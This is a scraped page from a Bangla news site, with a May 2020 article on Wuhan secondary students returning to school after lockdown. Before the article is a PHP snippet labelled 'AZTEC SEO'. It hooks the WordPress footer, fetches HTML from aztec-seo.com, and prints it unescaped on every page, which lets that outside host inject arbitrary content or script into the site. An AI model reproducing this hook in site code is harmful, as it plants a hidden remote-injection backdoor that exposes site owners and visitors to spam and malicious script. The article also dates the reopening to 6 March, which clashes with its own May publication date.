/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); করোনা জয় করে স্কুলে ফিরছে উহানের শিক্ষার্থীরা | Dhaka Sky News

ক্ষুদ্র উদ্যোক্তাদের জন্য ১১শ কোটি টাকা দাবি

আগের সংবাদ

বড় ক্ষতির মুখে ইংল্যান্ড ক্রিকেট বোর্ড

পরের সংবাদ

করোনা জয় করে স্কুলে ফিরছে উহানের শিক্ষার্থীরা

ঢাকা স্কাই নিউজ

প্রকাশিত: May 7, 2020 , 7:33 pm

বর্তমানে পুরো বিশ্বে জীবনব্যবস্থা থমকে আছে করোনা ভাইরাসের প্রভাবে। তবে চীনের যে উহান থেকে করোনা ভাইরাস ছড়িয়ে পড়েছিল সারা বিশ্বে সে শহরে আবারও স্বাভাবিক হয়ে এসেছে জীবনযাত্রা। দীর্ঘদিন লকডাউনে থাকার পর করোনা ভাইরাসের প্রার্দুভাবের পর এ প্রথম ৬ মার্চ থেকে চীনের সবচেয়ে বেশি মৃত্যুর সাক্ষী হওয়া হুবেই শহরের স্কুলগুলো খুলে দেয়া হয়েছে।

তবে সামনে পাবলিক পরীক্ষা থাকায় এখন শুধুমাত্র ৯ম থেকে দ্বাদশ শ্রেণির শিক্ষার্থীরা ক্লাশে অংশ নিবে এবং অন্যরা বাসায় থাকবে। চীনের অন্য শহরের দ্বাদশ শ্রেণিতে ইতোমধ্যে ক্লাশ শুরু হয়েছে। এসব শিক্ষার্থীরা বিশ্ববিদ্যিালয়ের প্রবেশের ভর্তি পরীক্ষা “গাওকো”-তে অংশ নিবে কিছুদিনের মধ্যেই।

তবে স্কুলে যাওয়ার আগে শিক্ষার্থীদের করোনা পরীক্ষা করানো হবে। তাছাড়া স্কুলে শিক্ষার্থীদের সামাজিক দূরত্ব বজায় রেখে পাঠদান করা হবে। উল্লেখ্য, শহরটির ৫৭ হাজার শিক্ষার্থী স্কুলে প্রবেশের অপেক্ষায় আছে।